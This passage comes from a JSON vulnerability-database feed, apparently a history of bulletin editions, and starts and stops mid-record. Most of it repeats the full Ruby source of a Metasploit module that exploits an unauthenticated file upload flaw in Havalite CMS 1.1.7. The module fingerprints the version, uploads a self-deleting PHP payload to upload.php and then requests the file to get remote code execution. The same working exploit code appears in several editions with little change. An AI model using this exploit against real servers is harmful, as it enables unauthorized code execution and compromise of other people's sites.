res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-16T03:45:49", "differentElements": ["modified", "published"], "edition": 26}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-16T15:49:35", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-03-16T15:49:35", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-16T15:49:35", "differentElements": ["modified", "published"], "edition": 27}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-16T17:49:46", "history": [], "viewCount": 2, "enchantments": {"score": {"modified": "2018-03-16T17:49:46", "value": 4.3, "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-16T17:49:46", "differentElements": ["modified", "published"], "edition": 28}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-22T07:52:47", "history": [], "viewCount": 2, "enchantments": {"score": {"modified": "2018-03-22T07:52:47", "value": 4.3, "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-22T07:52:47", "differentElements": ["modified", "published"], "edition": 29}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-22T11:44:33", "history": [], "viewCount": 2, "enchantments": {"score": {"modified": "2018-03-22T11:44:33", "value": 4.3, "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-22T11:44:33", "differentElements": ["modified", "published"], "edition": 30}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-24T09:55:02", "history": [], "viewCount": 2, "enchantments": {"score": {"modified": "2018-03-24T09:55:02", "value": 4.3, "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-24T09:55:02", "differentElements": ["modified", "published"], "edition": 31}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-24T15:57:56", "history": [], "viewCount": 2, "enchantments": {"score": {"modified": "2018-03-24T15:57:56", "value": 4.3, "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-24T15:57:56", "differentElements": ["modified", "published"], "edition": 32}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-26T03:51:29", "history": [], "viewCount": 2, "enchantments": {"score": {"modified": "2018-03-26T03:51:29", "value": 4.3, "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n 